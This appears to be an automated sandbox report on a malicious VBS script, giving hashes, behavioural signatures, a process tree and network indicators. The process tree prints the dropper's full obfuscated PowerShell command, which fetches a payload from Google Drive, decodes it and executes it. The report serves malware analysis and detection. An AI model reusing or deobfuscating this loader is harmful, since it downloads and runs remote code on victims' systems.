Analysis
- max time kernel: 121s
- max time network: 122s
- platform: windows7_x64
- resource: win7-20240508-en
- resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
- submitted: 08/06/2024, 07:18
Static task: static1
Behavioral task: behavioral1
- Sample: 83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs
- Resource: win7-20240508-en
Behavioral task: behavioral2
- Sample: 83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs
- Resource: win10v2004-20240426-en
General
- Target: 83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs
- Size: 23KB
- MD5: 70e2991e57991e054e3473a4a9ec2a63
- SHA1: 1fe4276566a2c6e7db0ab8b85cdc7b4de9cf86c1
- SHA256: 83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d
- SHA512: 4f32f979ca9da2bcca42d727f08215f8b652b17d0e98d9e31fe6f5414789731bf9805d8f74990af917ea8c2b0b4f0fa9124101759df17d4c601d90670f76300d
- SSDEEP: 384:AcYk2uAnvIa7Yp000ekqThmLjp45PyUi6KkNXmNYXkfRf:Acx2p57qQqejpAPyUi6BNXxUft
Malware Config
Signatures
- Blocklisted process makes network request (3 IoCs)
  flow  pid   Process
  3     2428  WScript.exe
  7     464   powershell.exe
  9     464   powershell.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow  ioc
  7     drive.google.com
  6     drive.google.com
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid   Process
  464   powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid   Process
  Token: SeDebugPrivilege  464   powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  description                      pid   Process         procid_target
  PID 2428 wrote to memory of 464  2428  WScript.exe     28
  PID 2428 wrote to memory of 464  2428  WScript.exe     28
  PID 2428 wrote to memory of 464  2428  WScript.exe     28
  PID 464 wrote to memory of 3064  464   powershell.exe  30
  PID 464 wrote to memory of 3064  464   powershell.exe  30
  PID 464 wrote to memory of 3064  464   powershell.exe  30
Processes

C:\Windows\System32\WScript.exe (depth 1)
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs"
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID: 2428
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Lgknoldet = 1;Function Berringsfladen190($Scratchcard){$Coil=$Scratchcard.Length-$Lgknoldet;$Kodfoderets='Substring';For( $gadebilledet=7;$gadebilledet -lt $Coil;$gadebilledet+=8){$Underargue+=$Scratchcard.$Kodfoderets.Invoke( $gadebilledet, $Lgknoldet);}$Underargue;}function Forlyder($Climata11){ & ($Spatten) ($Climata11);}$benzimidazole=Berringsfladen190 'At,osfrMOsteopeoWheelabzIconveriAnnicaslSquiffilUndisciaSyninge/ Militr5Autobah.R.educa0Nonrege Untast.(ArbejdsWKonsti i UnderlnapiolindThermogoSvensknwPhototusKelpi,g TwofersNNudni.kTEntreat aianis1 Ari.rs0Aminotr. Heglin0Ostraci;Reguler FenolerWBestredi OpremsnBredspe6Kandi,a4Ba depl;Salater TilflyxDirecto6Profite4Hyperfo; Curumi Cam,hacrbrndborvPluri.o:Smit et1Uvaerd 2Undergr1Omlbets.Snitvrk0Phenoge)rgsjler KonsumpG bi.dsee EthanocIlluderk Embo,co Re.ren/Sarcorh2B,edsaa0 Lemmed1Osmousa0Karskca0Teknolo1.nitsel0Fagvide1Enbran, DelthedFtro,ekliM,crospr.iggyslechalanafLeukemio UdpegexM ckere/Klockma1Justtre2l,njefa1Renerne.Unmecha0Sa mens ';$Tirve=Berringsfladen190 'ImpoverUTandlgesMyelineeslickinrReempha- AngepiA BerusegOpinioneEksisten infinitEskimol ';$hawklike=Berringsfladen190 'PaneulohPrinzhot lar.ertDaavildp Si.onisSam.and:Pict.an/Lystopf/outw.rkdFastholrBrut.oiiGestikuvPhocenie Deir r.Huchof,gdissei,oUnbarspo.icondygHalvkuglKlvedese Firepl.Afnati.c IntranoPruditym,pasmol/T.letaduruf sitcSvmmela?Discrete ArchpaxClinoc pTr adreoPatri.trStemmeptF rulem=Asplenidneighboo,dscripw pill anGallardlatomythotautoloaProx,mod Beeroc&D,llerii ChoribdForbrnd=Ostraco1FyrmestRStaminaRSplurgigReprovip Echino_Centr,fRBrnelrdz Rvrdig2Enceph,yClothotpSuitlikiOculonaJforbrydcStreget0Kyphosi0 ,radusN Pi,udipOceanisuFuturisZ T,ille4goo nesPChaperot gyrome-MateriaiAabenbaw Stnned9WellermvMinimumjDeserteKSektion2 Nonmet7Ganglio2grundta ';$Galliwasp=Berringsfladen190 ' Cumbro>Noncura ';$Spatten=Berringsfladen190 
'cylindeiAntisipespionsax Lkkers ';$Cestos='Plsebar';$Uncastle = Berringsfladen190 'Skrukh.eVarebetc BoremahResorbeoRebuoya Dobbel%GuldaldaRebunchpUnglac pInstrumd Dent,iaNonsenst Slavd,a .akers% Uncarn\rovsingkKassea r Phyl.oe DammusdT larigiUnraptutCurvulatDonkeyke F somhnInterd,.LeatherN estlndoFunnellnudstykn Tanksta&indenri&populat Sk,vrigeFixearbcUnaturehDespotioRedisti SiegeabtHyleton ';Forlyder (Berringsfladen190 'Minxshi$kazaktagperspe l Yi,esao ellw nbMentoriaMaintailweather:GetatabBGrat,iteFalsknekAl,rinslSt,diecaResign gSluknineForeloulJoniseriJant.rsg HandedeFolkedor Ringvee comedis Angleb=Lsepult(Codesigc Forligm asturtdW.ndfla Coilyea/Wal,mancMilieur unmole$AndensiUOverfornStn,etsc GratisaForv klsArteriotDiphtholSeriocoeVampyr )Imm nas ');Forlyder (Berringsfladen190 'Ekst.at$t,kstmag BalloolTahinamoVan,alibAlgeaspaSusendel Bortad:,iatomeBgaspistuFun.ametValfar.y OutgoilMilitrnaEl.ktrimLiljekoi,ignalbnForbruseDisprop=gy,ospo$VelopdrhefterkraSeksogtwDirekt.kYaqo,aslKradsemiOrd einkSeptleveAscidio.Maaltids UnriskpCoveraglHusstaniEnergimtV,dired(Vlverhu$SprngkrGclo steaArno.islMurmurelGalosheiE fektiwSyskedaa SentimsBancosrpWeelvir)Hemolym ');$hawklike=$Butylamine[0];$Icterine= (Berringsfladen190 'Lysesta$ Unp,esgMisapprlLygtem,oCliquisb ParqueaSuppegrlWooersv:F.rbldtBti,guytrStreli nPallidieSpo,tedsReturneaUndisseaLiv,lanrBortled=Lich opN Celeb,eKalve,rw E,char-Pa,asubOHoverenbHerbagej.ilburseNonpondc U urdet Regara CeilingSCalibrayBreechlsLutianitMancheseCertifimOvulist.Homoc.nNS ldiereO.cultitRa,atou.D.ppelkWHeltindeOutpoisbTruistiCPa,tsuil R,bbiniDyr.naveAk,iespnSelektit');$Icterine+=$Beklageligeres[1];Forlyder ($Icterine);Forlyder (Berringsfladen190 ' Sundhe$ Besku BKampk,ar DopplenPoncedneSjlelivs Khahooa,orestia RigborrUnf.rio.WortworH Fritage MonograDemiss.dkonsumeeHelbredr deconcsDru.maa[Rodkno.$TeleskoTSpk.uggi Unn tirArtillevCoronateCurs,re] Rea,ti=Reperso$AsketerbMiljpaaeBeboelsnbamboozzHal.geniyerkednmPsammopiIndividd commena 
Lemlstz.ackeysoKildeskl ynenefe Opslmm ');$Vicontiels=Berringsfladen190 ' Cult v$PaginerB Eve,tyrUr,nomenAfgangseRibningsMu icataBesgactaCognat rGenicul.PorphyrDBilandeoargumenwMac.otonEfterralTollek osmlehovaOvervind OversiFTv vlraiTeledenlLeikafoeBitterb(titulad$Data.ash NuleneaEscandawKphjestkLeukstrl Daughti Ug.kork arbuckeRegnska,Galgenf$ AfdampP Uhllost ashpeeeRiddamprAepost oseismomsBrandfapIndsk.ieLedelinr Ejend.mTrffedeo aestrouGalmandswurleyp)Unfavou ';$Pterospermous=$Beklageligeres[0];Forlyder (Berringsfladen190 ' Flyv,r$Plu,aligKompenslA elopro ThreepbGa.tritaKontoralBlommes: Heli.pOOpskrtekOneirosknotkerieFrihederGaneftrn,arkanteAttaindsSpkhugg1Velaryd9Spisefr8Skybru =Amatrni(AnretteTPlisseee MglingsWeirdybtTheoris-kemikalPDeplaneaWackymutSsonerchSrtilfl Noshers$DagtjenPTvivllstAlcaic,eElessarrhaandhvoUdsk.ftsAfstivepUnderekeOpinionrUanseelmcalycoioDelfiunu NidifisVirksom)Pal,ada ');while (!$Okkernes198) {Forlyder (Berringsfladen190 'Roseola$T.lkebigBkke,belOpslideoFa vetabH lverea Trfsikl Becree: rigsrVTakkeklvExtillveTweedjar oliedriStk.ingsFidd eb=Slutdis$PrognostimmoralrFaint su Dis,oneAnissma ') ;Forlyder $Vicontiels;Forlyder (Berringsfladen190 ' Chond.SRet eadtAmm.nitaNondemarMaa,edstSteekin-MarmoreSnetstrmlR,jsebeeTelephoeUnpeacepStr,gsr Bryllup4fire,ar ');Forlyder (Berringsfladen190 'Fo.efal$SporinggMouthp lDdedansoNoexfrdb oughesa nstabil Dephlo: FormueO.panagekEpiz,oakHeweunpe agustircapitulnNonferoeVindikas Karrie1 cciput9Aa.esky8elletre=Adulter(Afsy inTRevivale Ciconis otaltetBumleno-DemagniPPleurocaCorriget.aandudhFrstesa ,linkfy$BrneforPBecommatPlatteneHungerlrSalgssto BortsasFoliernpSindelae ContemrPreheatmZollsuboDicho,duKod ficsproblem)Mink.ar ') ;Forlyder (Berringsfladen190 'Oliefar$Konc rngAnaly.el GlyoxyoRaf.inebDisq,isaZoransbl Arguit:KulturmPOrthoceuVerden,sWigletstEdsformeCaloricrKolonneuDe.elecm FortepmVemo.sse,nlagemnCha,emoe Dimiss=Phellog$NotochogSocketll,ndespooVammelhbBrakvanaByggemylStoette:Kolokv.eEjendomxNonulcecPebbleha 
undervvRaakremaCrookintSre ebaeDeskr,ps Unfatt+Avenuer+Steffis% Sku.ri$Joypop.BChokolauM.tvasktPriorizyLigaturlMagnascaEarscremStratociFrimeninS.hverteTwe vem.WanglincTruttacoweaseleu.udipednSe,vanttKa.eand ') ;$hawklike=$Butylamine[$Pusterummene];}$unentrapped=293328;$Zooplasty177=30076;Forlyder (Berringsfladen190 'Espe,an$ SelskagSt.gsejlTacheomoSemiquibActuariarecrushl fisker:RelishiAKompromgSemostogCircumfrG,noesee Ensilag,yppelsaB holdntMultisoeKejserptUdkaarisEt.onom Mor,inb=Outbrag TindingGGlycopeeLvs.ovetassurer-EineborC Mol,bdoOptrkkenunl.beltPyrenoieGrskepen Gyrinit F lker Uncolor$ Gluep PFo.dumstEgalitee EmissirScaremoodesertes UnderdpbeadroleComputeropercu mFugtigkoSjllanduColyticsPa idae ');Forlyder (Berringsfladen190 'Enaptse$CurranagPonyerslSlutbetoShoddywbCapsuliaNervulolGospel.: Bur.auR Dysleke O alizlHomotraeSaltiesgGymnasieAshramsrEidologi TuparanFotocelg Sorthae E.odfirScutchen Keelmae RenummsAngrebs Roekamp= Syg.jo Ahoycri[SuperesSUdtagetyLanier,sResprintAirbruseNavle,em Spor.e.Propo,tCEnamou oKonkurrnNeo.acivGladsakeSv,dekurUskoksntproinve]Refinis:Trowser:TaenkteFSerb rarEk pedeoNonellimMiswaytBSa menbaEntredesUnintereSaunder6Aminosy4 ReeshiSCarcinotdukkevorDiptycaiZind.senHelautogStrenge(Grovvar$ MethodAkassablgJackersg EventurShockineAnimistgTrini raBehov.ntPrereveeSlagt,ft LollypsBillige) Predic ');Forlyder (Berringsfladen190 ' Pa til$Dy frosgDesorbel RechaloFortrngbL idensaslavehal,astril:MutismpPSamhrigr ReciviaAfholdei holines C relleBeedigerInd,ere Forhold=Superw pehohom[.earlssSDeci.esybsseninsDiscerpt ybstegeModstanmE.ratum.RestrikT InexoreH,lgenex Sc,phatSpouseh. 
sningeEBnd llanLejdesacO,erridoFamlesfdDicingoi Thiochn GigologDunamsd] Sp,nta:Stor.ed:KorrigaAFa veglSMill onCRkkeflgI ,ricotIFl essa.ChromomG .ipskgeSorglstt PseudoSBal.egntDmning.rThistediGi.bettnKonsummgrekapit(Trumfst$HudsoniRToys,meeCheesemlRetorsie TransmgKunstmaeBlegso rMetazoai DublednAdvocatgPudderne KnackerFlerdobnWiener,eNiaisgusNo,syll) Bitsto ');Forlyder (Berringsfladen190 'Searcha$Teori.ngrattrailMavercao Unmustb StorfaaSonicatl Decolo: LancerACa,pfirsIltningk Stabile ImpenetSlalomeeUnoilgrn.apperl=un rook$DansetrPFlabederstabelvaRodeoeni ,rydefsretfrd eTaranchrDrif.sp.TopkicksAdhib.tuBe,ryprbGenindssAffronttPiperylrSort.meiindissonLagringgApathi,(No.comp$ThessaluMonostenVeerufyeLaasesmnBescurft Loathsr,uldbryaOperaerpdiskenspVenialieBocher.dTatt dd,Stillin$ReappliZGevreruoslutt dodefencepuretms.l.onsellaMenufilsCataclytTote.ply.erolig1Spidsmu7Mrkelig7Bouillo)Que.ule ');Forlyder $Asketen;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 464

C:\Windows\system32\cmd.exe (depth 3)
Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\kreditten.Non && echo t"
PID: 3064
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 4KB
- MD5: 36113f68a185488c2fbe2bfcf34bcfdc
- SHA1: 3e702a1bda44d41c8fad9ad56039be843c9a0706
- SHA256: fb796fb121a29aed4ca01f2cce8d3b59b70afd4978cbecd25625c2c45812e233
- SHA512: 96bd9b00e3a3a6dc789bbb5414206e826b412596c39044b6c8e5d4a8624d49b75a991714858fa7c7d4bd5864cca82473eb311ef08d2fbddc33e1f7ff3f1ade45